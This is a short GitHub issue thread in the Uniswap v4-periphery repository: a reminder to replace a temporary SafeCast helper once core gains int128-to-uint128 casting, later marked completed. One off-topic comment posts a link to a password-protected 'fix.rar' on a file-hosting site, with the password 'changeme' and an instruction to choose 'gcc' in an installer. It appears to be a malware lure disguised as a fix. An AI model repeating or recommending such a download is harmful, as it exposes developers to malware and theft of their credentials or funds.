### ISSUE TITLE
reminder: Replace SafeCastTemp

### ISSUE THREAD

**Issue by saucepoint** [Uniswap/v4-periphery#305]
### Component

General design optimization (improving efficiency, cleanliness, or developer experience)

### Describe the suggested feature and problem it solves.

Reminder issue to replace SafeCastTemp when we have int128 -> uint128 in core

https://github.com/Uniswap/v4-core/pull/850

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by saucepoint** [comment]
completed in https://github.com/Uniswap/v4-periphery/pull/337
